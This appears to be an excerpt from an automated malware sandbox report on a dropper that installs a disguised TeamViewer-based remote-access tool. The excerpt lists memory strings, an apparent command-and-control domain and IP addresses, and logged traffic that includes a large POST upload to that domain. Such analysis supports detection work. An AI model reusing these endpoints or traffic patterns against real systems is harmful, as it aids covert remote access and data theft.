Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://go.teamviewer.comn0
Source: UniPrint.exe, 00000005.00000003.710224733.00000000057D9000.00000004.00000001.sdmp | String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001
Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmp | String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001;
Source: UniPrint.exe, 00000005.00000003.709879277.00000000057F0000.00000004.00000001.sdmp | String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001ndows.Phot
Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmp | String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001s
Source: UniPrint.exe, 00000005.00000002.1073157453.0000000000B65000.00000004.00000020.sdmp | String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp | String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047145&client=DynGate&p=10000002
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp | String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047145&client=DynGate&p=10000002u
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp | String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047152&client=DynGate&p=10000002
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp | String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047152&client=DynGate&p=100000026
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp | String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047159&client=DynGate&p=10000002
Source: UniPrint.exe, 00000005.00000003.710194245.00000000057D4000.00000004.00000001.sdmp | String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047159&client=DynGate&p=100000023v
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp, UniPrint.exe, 00000005.00000003.713534320.0000000005721000.00000004.00000001.sdmp | String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047224&client=DynGate&p=10000002
Source: UniPrint.exe, 00000005.00000003.715254848.0000000005801000.00000004.00000001.sdmp | String found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047224&client=DynGate&p=10000002321935-2125563209-405306
Source: UniPrint.exe, 00000005.00000002.1073179417.0000000000B68000.00000004.00000020.sdmp | String found in binary or memory: http://master13.teamviewer.com/dout.aspx?s=42047145&p=10000001&client=DynGate&data=FyQSbQCjHqkys5Mko
Source: UniPrint.exe, 00000005.00000002.1073127658.0000000000B5D000.00000004.00000020.sdmp | String found in binary or memory: http://master13.teamviewer.com/dout.aspx?s=42047152&p=10000001&client=DynGate&data=FyQS8QAjHqmyuig6s
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp | String found in binary or memory: http://master13.teamviewer.com/dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp, UniPrint.exe, 00000005.00000003.713565888.000000000576A000.00000004.00000001.sdmp, UniPrint.exe, 00000005.00000003.713161991.00000000057D0000.00000004.00000001.sdmp | String found in binary or memory: http://master13.teamviewer.com/dout.aspx?s=42047224&p=10000001&client=DynGate&data=FyQS6wChtjSytzoeq
Source: UniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmp | String found in binary or memory: http://mastr13.teamv
Source: UniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmp | String found in binary or memory: http://mastr13.teamviewer.com/din.aspx?s=0000000&client=DynGate&rnd=2
Source: wogZe27GBB.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: wogZe27GBB.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: wogZe27GBB.exe | String found in binary or memory: http://ocsp.digicert.com0C
Source: wogZe27GBB.exe | String found in binary or memory: http://ocsp.digicert.com0O
Source: wogZe27GBB.exe | String found in binary or memory: http://ocsp.sectigo.com0
Source: UniPrint.exe, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.TeamViewer.com
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.TeamViewer.com#http://www.TeamViewer.com/licensing
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.TeamViewer.com/download
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.TeamViewer.com/help
Source: wogZe27GBB.exe | String found in binary or memory: http://www.digicert.com/CPS0
Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmp | String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmp | String found in binary or memory: http://www.g5e.com/termsofservice
Source: nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.teamviewer.com
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000000.684861880.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.teamviewer.com/CConnectionHistoryManager::createMessageString():
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.teamviewer.com/company/index.aspx
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.teamviewer.com/download/beta.aspx
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.teamviewer.com/download/version_4x/TeamViewerQS.exe
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.teamviewer.com/download/version_5x/TeamViewerQS.exe
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.teamviewer.com/favicon.ico
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.teamviewer.com/help/connectivity.aspx:
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.teamviewer.com/help/support.aspxK
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx
Source: UniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmp | String found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx?version=
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.teamviewer.com/ja/integrated/trial.aspx?ID=%1%&IC=%2%
Source: UniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmp | String found in binary or memory: http://www.teamviewer.com/ja/licensing/commercialuse.aspx
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.teamviewer.com/licensing/commercialuse.aspx
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: http://www.teamviewer.com/licensing/register.aspx&http://www.teamviewer.com/r$$id$$.aspx7http://www.
Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmp | String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmp | String found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 00000010.00000003.794457434.00000217C6F81000.00000004.00000001.sdmp | String found in binary or memory: https://displaycatalog.m(
Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmp | String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: wogZe27GBB.exe | String found in binary or memory: https://sectigo.com/CPS0
Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmp | String found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp | String found in binary or memory: https://widolapsed.info/
Source: UniPrint.exe, 00000005.00000002.1075859898.00000000057DB000.00000004.00000001.sdmp | String found in binary or memory: https://widolapsed.info/8C631A8/ELBASE.dll.mui01
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp | String found in binary or memory: https://widolapsed.info/B8C631A8/
Source: UniPrint.exe, 00000005.00000002.1075859898.00000000057DB000.00000004.00000001.sdmp | String found in binary or memory: https://widolapsed.info/B8C631A8/(c~
Source: UniPrint.exe, 00000005.00000003.855571733.00000000057D3000.00000004.00000001.sdmp | String found in binary or memory: https://widolapsed.info/B8C631A8/.i
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp | String found in binary or memory: https://widolapsed.info/B8C631A8/8
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp | String found in binary or memory: https://widolapsed.info/B8C631A8/B
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp | String found in binary or memory: https://widolapsed.info/B8C631A8/ELBASE.dll.mui01
Source: UniPrint.exe, 00000005.00000002.1075859898.00000000057DB000.00000004.00000001.sdmp | String found in binary or memory: https://widolapsed.info/apsed.info/B8C631A8/TTP-Out)LMEMX
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp | String found in binary or memory: https://widolapsed.info/apsed.info/qWave
Source: wogZe27GBB.exe | String found in binary or memory: https://www.digicert.com/CPS0
Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmp | String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmp | String found in binary or memory: https://www.roblox.com/info/privacy
Source: UniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmp, UniPrint.exe, 00000005.00000002.1073981229.0000000002740000.00000004.00000001.sdmp | String found in binary or memory: https://www.teamviewer.com/buy-now/?utm_medium=masterads&utm_source=master-commercial-use&utm_campai
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr | String found in binary or memory: https://www.teamviewer.com/licensing/order.aspx?lng=ja
Source: svchost.exe, 00000010.00000003.797707479.00000217C6FB0000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.797621613.00000217C6F5E000.00000004.00000001.sdmp | String found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: UniPrint.exe, 00000005.00000002.1072984731.0000000000B00000.00000004.00000020.sdmp | String found in binary or memory: https://www.verisign.c
Source: unknown | HTTP traffic detected: POST /B8C631A8/ HTTP/1.1 | Content-Length: 85991 | Content-Type: multipart/form-data; boundary=--------988836371 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: widolapsed.info | Connection: Close | Cache-Control: no-cache
Source: unknown | DNS traffic detected: queries for: ping3.dyngate.com
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | Code function: 3_2_6E5C5900 GetProcessHeap,GetProcessHeap,HeapAlloc,HttpQueryInfoW,InternetReadFile,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,RtlMoveMemory,InternetReadFile,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master13.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /dout.aspx?s=42047145&p=10000001&client=DynGate&data=FyQSbQCjHqkys5MkoZ6YmBgcGRsZGpmckySiHpgTJqChnpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJqSiHpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJ6meq7S3GZcYmJMrHpialxgXGxwbkCip HTTP/1.1 | Accept: */* | Content-Type: application/octet-stream | Content-Transfer-Encoding: binary | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master13.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=42047145&client=DynGate&p=10000002 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master13.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master13.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /dout.aspx?s=42047152&p=10000001&client=DynGate&data=FyQS8QAjHqmyuig6sTY0saWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAH7LQs0qhaWs0MJjaOW1RZp/s+y/yn5XEbeVZg9sKBJ5zPw4VSW4zdwQ3dPOJPU35FNkIfcILZEzewXzbzR9HNSPt0dvZIMvjxebsFa8mt4yIfhUHNJCrU/eCKZvCgbkPO7XECRgFWPWpqy/DxavH2VA1uMNeC6MgWi1tqYJlUpU HTTP/1.1 | Accept: */* | Content-Type: application/octet-stream | Content-Transfer-Encoding: binary | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master13.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=42047152&client=DynGate&p=10000002 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master13.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master13.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU HTTP/1.1 | Accept: */* | Content-Type: application/octet-stream | Content-Transfer-Encoding: binary | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master13.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=42047159&client=DynGate&p=10000002 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master13.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master13.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /dout.aspx?s=42047224&p=10000001&client=DynGate&data=FyQS6wChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMlsrK4MLY0uzKemJMmMLczurCzsp61MJMmNLGytzmyqjy4Mp6YEyakoh6YPDKxsxoxMRwcsRmZG6+ZHJqbGhwYGxkbEyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpqTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1 | Accept: */* | Content-Type: application/octet-stream | Content-Transfer-Encoding: binary | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master13.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=42047224&client=DynGate&p=10000002 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: master13.teamviewer.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: 188.172.235.146 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /din.aspx?s=12251267&m=fast&client=DynGate&p=10000002 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) | Host: 188.172.235.146 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown | HTTPS traffic detected: 45.153.241.148:443 -> 192.168.2.4:49767 version: TLS 1.2